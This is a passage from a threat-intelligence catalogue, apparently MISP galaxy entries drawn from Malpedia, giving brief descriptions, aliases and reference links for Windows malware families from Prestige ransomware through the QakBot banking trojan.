According to PCrisk, Prestige is ransomware - malware that prevents victims from accessing (opening) their files by encrypting them. Additionally, Prestige appends the ".enc" extension to filenames and drops the "README" file containing a ransom note. An example of how this ransomware modifies filenames: it renames "1.jpg" to "1.jpg.enc", "2.png" to "2.png.enc", and so forth.

The tag is: misp-galaxy:malpedia="Prestige"

Prestige is also known as:

Table 4315. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.prestige

https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/

https://www.microsoft.com/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/

PrivateLoader

According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.

The tag is: misp-galaxy:malpedia="PrivateLoader"

PrivateLoader is also known as:

Table 4319. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader

https://www.youtube.com/watch?v=Ldp7eESQotM

https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1

https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service

https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign

https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/

https://tavares.re/blog/2022/06/06/hunting-privateloader-pay-per-install-service/

https://embee-research.ghost.io/identifying-privateloader-servers-with-censys/

https://www.bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey

https://www.trendmicro.com/en_us/research/22/e/netdooka-framework-distributed-via-privateloader-ppi.html

https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem

https://intel471.com/blog/privateloader-malware

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://any.run/cybersecurity-blog/privateloader-analyzing-the-encryption-and-decryption-of-a-modern-loader/

https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f

https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey

https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e

https://www.zscaler.com/blogs/security-research/peeking-privateloader

https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise

Project Hook POS

The tag is: misp-galaxy:malpedia="Project Hook POS"

Project Hook POS is also known as:

Table 4321. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.project_hook

https://threatpost.com/dexter-project-hook-pos-malware-campaigns-persist/104655/

Prometei (Windows)

According to Lior Rochberger, Cybereason, prometei is a modular and multi-stage cryptocurrency botnet. It was discovered in July 2020, Cybereason Nocturnus team found evidence that this Prometei has been evolved since 2016. There are Linux and Windows versions of this malware.

The tag is: misp-galaxy:malpedia="Prometei (Windows)"

Prometei (Windows) is also known as:

Table 4322. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.prometei

https://twitter.com/honeymoon_ioc/status/1494016518694309896

https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer—​a-ransomware—​and-a-botnet-join-the-part.html

https://blog.talosintelligence.com/prometei-botnet-improves/

https://twitter.com/honeymoon_ioc/status/1494311182550904840

https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities

proteus

The tag is: misp-galaxy:malpedia="proteus"

proteus is also known as:

Table 4324. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.proteus

https://www.fortinet.com/blog/threat-research/a-new-all-in-one-botnet-proteus.html

Proto8RAT

The tag is: misp-galaxy:malpedia="Proto8RAT"

Proto8RAT is also known as:

Table 4325. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.proto8_rat

https://github.com/avast/ioc/tree/master/OperationDragonCastling

PseudoManuscrypt

According to PCrisk, PseudoManuscrypt is the name of the malware that spies on victims. It is similar to another malware called Manuscrypt. We have discovered PseudoManuscrypt while checking installers for pirated software (one of the examples is a fake pirated installer for SolarWinds - a network monitoring software).

The tag is: misp-galaxy:malpedia="PseudoManuscrypt"

PseudoManuscrypt is also known as:

Table 4328. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pseudo_manuscrypt

https://www.youtube.com/watch?v=uakw2HMGZ-I

https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/

https://asec.ahnlab.com/en/31683/

https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1

https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1

https://ics-cert.kaspersky.com/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/

PsiX

According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule in binaries until mid of September 2018.

In binaries, apart from BotModule and MainModule, references to the following Modules have be observed: BrowserModule BTCModule ComplexModule KeyLoggerModule OutlookModule ProcessModule RansomwareModule SkypeModule

The tag is: misp-galaxy:malpedia="PsiX"

PsiX is also known as:

  • PsiXBot

Table 4329. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.psix

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://www.proofpoint.com/us/threat-insight/post/psixbot-continues-evolve-updated-dns-infrastructure

https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module

https://blog.comodo.com/comodo-news/versions-of-psixbot/

https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/

https://twitter.com/seckle_ch/status/1169558035649433600

https://twitter.com/mesa_matt/status/1035211747957923840

PC Surveillance System

Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies.

The tag is: misp-galaxy:malpedia="PC Surveillance System"

PC Surveillance System is also known as:

  • PSS

Table 4331. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pss

https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/

Pteranodon

The tag is: misp-galaxy:malpedia="Pteranodon"

Pteranodon is also known as:

  • Pterodo

Table 4332. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon

https://blogs.cisco.com/security/network-footprints-of-gamaredon-group

https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021

https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/Gamaredon_activity.pdf

https://blog.threatstop.com/russian-apt-gamaredon-group

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine

https://labs.sentinelone.com/pro-russian-cyberspy-gamaredon-intensifies-ukrainian-security-targeting/

https://www.threatstop.com/blog/gamaredon-group-understanding-the-russian-apt

https://cert.gov.ua/news/42

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine

https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution

https://www.bleepingcomputer.com/news/security/russian-gamaredon-hackers-use-8-new-malware-payloads-in-attacks/

https://blog.yoroi.company/research/cyberwarfare-a-deep-dive-into-the-latest-gamaredon-espionage-campaign/

https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html

https://www.elastic.co/blog/playing-defense-against-gamaredon-group

https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf

https://blogs.blackberry.com/en/2022/11/gamaredon-leverages-microsoft-office-docs-to-target-ukraine-government

https://cert.gov.ua/article/10702

https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/

https://cert.gov.ua/news/46

https://cert.gov.ua/article/2807

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations

https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/

https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/

https://attack.mitre.org/groups/G0047

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military

https://threatmon.io/cybergun-technical-analysis-of-the-armageddons-infostealer/

https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game

Punkey POS

The tag is: misp-galaxy:malpedia="Punkey POS"

Punkey POS is also known as:

  • poscardstealer

  • pospunk

  • punkeypos

Table 4334. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos

https://www.pandasecurity.com/mediacenter/malware/punkeypos/

https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/

pupy (Windows)

Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.

The tag is: misp-galaxy:malpedia="pupy (Windows)"

pupy (Windows) is also known as:

  • Patpoopy

Table 4335. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy

https://github.com/n1nj4sec/pupy

https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html

https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage

https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

https://www.infinitumit.com.tr/apt-35/

https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf

https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/

https://securityaffairs.co/wordpress/56348/intelligence/magic-hound-campaign.html

https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/

https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/

https://labs.k7computing.com/index.php/pupy-rat-hiding-under-werfaults-cover/

https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf

https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf

PureCrypter

According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021 The malware has been observed distributing a variety of remote access trojans and information stealers The loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software products PureCrypter features provide persistence, injection and defense mechanisms that are configurable in Google’s Protocol Buffer message format

The tag is: misp-galaxy:malpedia="PureCrypter"

PureCrypter is also known as:

Table 4336. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter

https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/

PurpleFox

Purple Fox uses msi.dll function, 'MsiInstallProductA', to download and execute its payload. The payload is a .msi file that contains encrypted shellcode including 32-bit and 64-bit versions. once executed the system will be restarted and uses the 'PendingFileRenameOperations' registry to rename it’s components.

Upon restart the rootkit capability of Purple Fox is invoked. It creates a suspended svchost process and injects a DLL that will create a driver with the rootkit capability.

The latest version of Purple Fox abuses open-source code to enable it’s rootkit components, which includes hiding and protecting its files and registry entries. It also abuses a file utility software to hide its DLL component, which deters reverse engineering.

The tag is: misp-galaxy:malpedia="PurpleFox"

PurpleFox is also known as:

Table 4339. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox

https://blog.malwarebytes.com/trojans/2021/03/perkiler-malware-turns-to-smb-brute-force-to-spread/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/IOCs-Purple-Fox.txt

https://blog.minerva-labs.com/malicious-telegram-installer-drops-purple-fox-rootkit

https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/

https://www.trendmicro.com/en_us/research/21/l/a-look-into-purple-fox-server-infrastructure.html

https://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/

https://threatresearch.ext.hp.com/purple-fox-exploit-kit-now-exploits-cve-2021-26411/

https://www.proofpoint.com/us/blog/threat-insight/chinese-malware-appears-earnest-across-cybercrime-threat-landscape

https://www.thecybersecuritytimes.com/purple-fox-malware-is-actively-distributed-via-telegram-installers/

https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/Technical%20Brief%20-%20A%20Look%20Into%20Purple%20Fox%E2%80%99s%20New%20Arrival%20Vector.pdf

https://www.trendmicro.com/en_in/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html

https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/

https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html

https://nao-sec.org/2021/04/exploit-kit-still-sharpens-a-sword.html

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-the-impact-of-cryptocurrency-mining-malware

https://www.trendmicro.com/en_us/research/21/g/purplefox-using-wpad-to-targent-indonesian-users.html

https://twitter.com/C0rk1_H/status/1412801973628272641?s=20

https://s.tencent.com/research/report/1322.html

https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html

https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html

PurpleWave

ZScaler reported on a new Infostealer called PurpleWave, which is written in C++ and silently installs itself onto a user’s system. It connects to a command and control (C&C) server to send system information and installs new malware onto the infected system.

The author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.

The tag is: misp-galaxy:malpedia="PurpleWave"

PurpleWave is also known as:

Table 4340. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave

https://www.zscaler.com/blogs/research/purplewave-new-infostealer-russia

Pushdo

Pushdo is usually classified as a "downloader" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.

The tag is: misp-galaxy:malpedia="Pushdo"

Pushdo is also known as:

Table 4341. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo

https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf

https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/

https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/

http://malware-traffic-analysis.net/2017/04/03/index2.html

https://www.secureworks.com/research/pushdo

https://www.secureworks.com/research/threat-profiles/gold-essex

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

http://www.secureworks.com/research/threat-profiles/gold-essex

Putabmow

The tag is: misp-galaxy:malpedia="Putabmow"

Putabmow is also known as:

Table 4342. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow

puzzlemaker

The dropper module is used to install two executables that pretend to be legitimate files belonging to Microsoft Windows OS. One of these files (%SYSTEM%\WmiPrvMon.exe) is registered as a service and is used as a launcher for the second executable. This second executable (%SYSTEM%\wmimon.dll) has the functionality of a remote shell and can be considered the main payload of the attack.

The tag is: misp-galaxy:malpedia="puzzlemaker"

puzzlemaker is also known as:

Table 4343. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.puzzlemaker

https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/

PwndLocker

PwndLocker is a ransomware that was observed in late 2019 and is reported to have been used to target businesses and local governments/cities. According to one source, ransom amounts demanded as part of PwndLocker activity range from $175k USD to $650k USD depending on the size of the network. PwndLocker attempts to disable a variety of Windows services so that their data can be encrypted. Various processes will also be targeted, such as web browsers and software related to security, backups, and databases. Shadow copies are cleared by the ransomware, and encryption of files occurs once the system has been prepared in this way. Executable files and those that are likely to be important for the system to continue to function appear to be skipped by the ransomware, and a large number of folders mostly related to Microsoft Windows system files are also ignored. As of March 2020, encrypted files have been observed with the added extensions of .key and .pwnd. Ransom notes are dropped in folders where encrypted files are found and also on the user’s desktop.

The tag is: misp-galaxy:malpedia="PwndLocker"

PwndLocker is also known as:

  • ProLock

Table 4345. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.group-ib.com/blog/prolock

https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.zdnet.com/article/fbi-prolock-ransomware-gains-access-to-victim-networks-via-qakbot-infections/

https://www.bleepingcomputer.com/news/security/pwndlocker-ransomware-gets-pwned-decryption-now-available/

https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/

https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/

https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/

https://www.group-ib.com/blog/prolock_evolution

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/

https://id-ransomware.blogspot.com/2019/10/pwndlocker-ransomware.html

https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html

https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://news.sophos.com/en-us/2020/07/27/prolock-ransomware-gives-you-the-first-8-kilobytes-of-decryption-for-free/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/

https://medium.com/s2wlab/operation-synctrek-e5013df8d167

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.intrinsec.com/egregor-prolock/

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

PXRECVOWEIWOEI

Information stealer, based on strings it seems to target crypto currencies, instant messengers, and browser data.

The tag is: misp-galaxy:malpedia="PXRECVOWEIWOEI"

PXRECVOWEIWOEI is also known as:

Table 4347. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pxrecvoweiwoei

https://twitter.com/suyog41/status/1688797716447432704

win.pyfiledel

Py2exe built worm propagating via USB drives, having wiper features embedded in the logic (based on today’s date being later than 2016-04-03 and existence of a file C:\txt.txt)

The tag is: misp-galaxy:malpedia="win.pyfiledel"

win.pyfiledel is also known as:

Table 4348. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pyfiledel

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm.win32.pyfiledel.aa

https://biebermalware.wordpress.com/2018/02/14/reversing-py2exe-binaries/

PyXie

Full-featured Python RAT compiled into an executable.

PyXie RAT functionality includes: * Man-in-the-middle (MITM) Interception * Web-injects * Keylogging * Credential harvesting * Network Scanning * Cookie theft * Clearing logs * Recording video * Running arbitrary payloads * Monitoring USB drives and exfiltrating data * WebDav server * Socks5 proxy * Virtual Network Connection (VNC) * Certificate theft * Inventorying software * Enumerating the domain with Sharphound

The tag is: misp-galaxy:malpedia="PyXie"

PyXie is also known as:

  • PyXie RAT

Table 4351. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pyxie

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/

https://www.secureworks.com/research/threat-profiles/gold-dupont

https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://threatvector.cylance.com/en_us/home/meet-pyxie-a-nefarious-new-python-rat.html

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.ic3.gov/Media/News/2021/211101.pdf

Qaccel

The tag is: misp-galaxy:malpedia="Qaccel"

Qaccel is also known as:

Table 4352. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel

QakBot

QBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.

The tag is: misp-galaxy:malpedia="QakBot"

QakBot is also known as:

  • Oakboat

  • Pinkslipbot

  • Qbot

  • Quakbot

Table 4354. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/

https://blog.vincss.net/2021/03/re021-qakbot-dangerous-malware-has-been-around-for-more-than-a-decade.html

https://isc.sans.edu/diary/rss/28728

https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/

https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/

https://blog.cyble.com/2023/02/17/the-many-faces-of-qakbot-malware-a-look-at-its-diverse-distribution-methods/

https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan

https://embee-research.ghost.io/advanced-threat-intel-queries-catching-83-qakbot-servers-with-regex-censys-and-tls-certificates/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://sublime.security/blog/detecting-qakbot-wsf-attachments-onenote-files-and-generic-attack-surface-reduction

https://www.netresec.com/?page=Blog&month=2023-03&post=QakBot-C2-Traffic

https://twitter.com/embee_research/status/1592067841154756610?s=20

https://www.securityhomework.net/articles/qakbot_ccs_prioritization_and_new_record_types/qakbot_ccs_prioritization_and_new_record_types.php

https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf

https://drive.google.com/file/d/1mO2Zb-Q94t39DvdASd4KNTPBD8JdkyC3/view

https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/

https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html

https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/

https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html

https://www.elastic.co/de/security-labs/qbot-malware-analysis

https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ

https://twitter.com/Unit42_Intel/status/1461004489234829320

https://perception-point.io/insights-into-an-excel-4-0-macro-attack-using-qakbot-malware

https://isc.sans.edu/diary/rss/28568

https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://documents.trendmicro.com/assets/pdf/Technical-Brief---The-Prelude-to-Ransomware-A-Look-into-Current-QAKBOT-Capabilities-and-Activity.pdf

https://www.group-ib.com/blog/prolock_evolution

https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf

https://www.elastic.co/security-labs/qbot-malware-analysis

https://www.splunk.com/en_us/blog/security/from-macros-to-no-macros-continuous-malware-improvements-by-qakbot.html

https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf

https://www.reliaquest.com/blog/qbot-black-basta-ransomware/

https://raw.githubusercontent.com/NtQuerySystemInformation/Malware-RE-papers/main/Qakbot%20report.pdf

https://assets.sentinelone.com/sentinellabs22/sentinellabs-blackbasta

https://blog.lumen.com/qakbot-retool-reinfect-recycle/

https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/

https://blog.group-ib.com/prometheus-tds

https://experience.mandiant.com/trending-evil-2/p/1

https://blog.quosec.net/posts/grap_qakbot_strings/

https://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a

https://news.sophos.com/en-us/2023/02/06/qakbot-onenote-attacks/

https://sansorg.egnyte.com/dl/ALlvwK6fp0

https://quosecgmbh.github.io/blog/grap_qakbot_strings.html

https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike

https://www.intrinsec.com/egregor-prolock/

https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/

https://www.malwarology.com/2022/04/qakbot-series-string-obfuscation/

https://www.um.edu.mt/library/oar/handle/123456789/76802

https://www.youtube.com/watch?v=iB1psRMtlqg

https://socprime.com/blog/qbot-malware-detection-old-dog-new-tricks/

https://www.socinvestigation.com/qbot-spreads-via-lnk-files-detection-response/

https://github.com/0xThiebaut/PCAPeek/

https://web.archive.org/web/20151026140427/https://www.symantec.com/security_response/writeup.jsp?docid=2009-050707-0639-99

https://news.sophos.com/en-us/2022/03/10/qakbot-injects-itself-into-the-middle-of-your-conversations/

https://web.archive.org/web/20110406012907/http://www.symantec.com/connect/blogs/qakbot-data-thief-unmasked-part-ii

https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html

https://www.bleepingcomputer.com/news/security/qbot-needs-only-30-minutes-to-steal-your-credentials-emails/

https://www.youtube.com/watch?v=gk7fCC5RiAQ

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf

https://asec.ahnlab.com/en/44662/

http://www.secureworks.com/research/threat-profiles/gold-lagoon

https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html

https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://embee-research.ghost.io/shodan-censys-queries/

https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf

https://www.justice.gov/d9/2023-08/23mj4251_application_redacted.pdf

https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html

https://www.group-ib.com/blog/egregor

https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/

https://syrion.me/malware/qakbot-bb-extractor/

https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf

https://www.bleepingcomputer.com/news/security/qbot-malware-switches-to-new-windows-installer-infection-vector/

https://twitter.com/ChouchWard/status/1405168040254316547

https://www.malwarology.com/posts/3-qakbot-process-injection/

https://isc.sans.edu/forums/diary/XLSB+Files+Because+Binary+is+Stealthier+Than+XML/28476/

https://twitter.com/kienbigmummy/status/1460537501676802051

https://www.team-cymru.com/post/visualizing-qakbot-infrastructure

https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot

https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/

https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/

https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/

